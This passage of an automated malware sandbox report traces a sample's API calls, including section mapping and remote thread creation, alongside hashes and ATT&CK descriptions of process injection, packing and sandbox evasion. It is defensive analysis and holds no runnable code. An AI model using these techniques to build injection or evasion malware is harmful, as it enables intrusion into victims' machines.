APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

Function 02E8003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E8024D

Strings

cess, xrefs: 02E8018D
kernel32.dll, xrefs: 02E8008F, 02E80095

Memory Dump Source

Source File: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e80000_fgbwcit.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: cdd8919f617255c7124f88763a9ee65c13e7e4487e499b19a24daaab5778fd6d
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 6D526975A01229DFDB64DF58C984BACBBB1BF09304F1480D9E94DAB351DB30AA89CF14

Function 004154C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 0041559F
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004155DC
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 004155FB

Strings

, xrefs: 00415505

Memory Dump Source

Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

Function 02C3A53C Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C3A564
Module32First.KERNEL32(00000000,00000224), ref: 02C3A584

Memory Dump Source

Source File: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2c37000_fgbwcit.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 686c79523a3b0b733c8bda8c62fd3f002e71bb9b7fcfb00df2f3e82d5542df4b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C6F09637600B146FD7217BF9AC8CB6E76E8AF8D624F100928E6C7950C0DB70E9554A61

Function 02E80E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02E80223,?,?), ref: 02E80E19
SetErrorMode.KERNELBASE(00000000,?,?,02E80223,?,?), ref: 02E80E1E

Memory Dump Source

Source File: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e80000_fgbwcit.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 57dacdb67886c003b0a5bbb9586af1258dae52b4a04d322c3a950f0f522bdb24
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: AAD0123214512877DB003A94DC09BCE7B1CDF05B66F008011FB0DD9080C770954046E5

Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F

Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B

Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F

Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F

Function 02C3A1FB Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C3A24C

Memory Dump Source

Source File: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2c37000_fgbwcit.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 2121ec5638ab992e842a685f410b1ed64ebbbf949b5d3a1c0c0a1028c8a325b6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 1F113C79A40208EFDB01DF98C985E98BBF5AF08350F158094F9889B361D371EA50EF80

Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B

Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

Function 00415490 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B18CE4,00415B2B), ref: 00415498

Memory Dump Source

Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14

Non-executed Functions

Function 00415690 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 004156C1
WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 004156E5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004156ED
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 0041572D
GetComputerNameW.KERNEL32(?,?), ref: 00415741
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041574F
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 0041575E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041576F

Strings

-, xrefs: 0041577C

Memory Dump Source

Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: 180134d01320781e28bb83f214f0822788da48fb39761615eb959522fdd3605f
Instruction ID: 7fd8cb6729a01aa94056f6f289b2ac9cdf2ab28260b2dbd3fc15e2ce888fda3c
Opcode Fuzzy Hash: 180134d01320781e28bb83f214f0822788da48fb39761615eb959522fdd3605f
Instruction Fuzzy Hash: C221F731A44304EBD721DFA4DC86BD97B70FB4C712F5140AAFA4DAA1C0CAB459C4CB59

Function 004157B0 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 004157E4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004157FF
HeapDestroy.KERNEL32(00000000), ref: 0041581E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415826

Memory Dump Source

Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 7d7ac3b01430fe9ad0e2703191a3d2b1ef9951b1f664e152f897c0a4f0d85179
Instruction ID: 68d425cf78a880d44cb9589aafc5291418f972827432eabaf25cd50abb90a3e4
Opcode Fuzzy Hash: 7d7ac3b01430fe9ad0e2703191a3d2b1ef9951b1f664e152f897c0a4f0d85179
Instruction Fuzzy Hash: 2401F270A82604DBE740FBB4ED89BDA7BA8F70C346F800036E60997280DA345C54CB9A

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

